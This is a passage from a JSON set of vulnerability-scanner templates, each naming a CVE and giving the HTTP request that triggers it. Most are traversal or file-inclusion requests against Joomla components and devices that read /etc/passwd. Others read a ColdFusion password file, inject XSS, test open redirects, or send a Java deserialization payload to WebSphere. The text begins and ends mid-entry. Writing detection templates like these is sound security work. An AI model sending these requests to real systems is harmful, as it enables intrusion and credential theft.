Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0N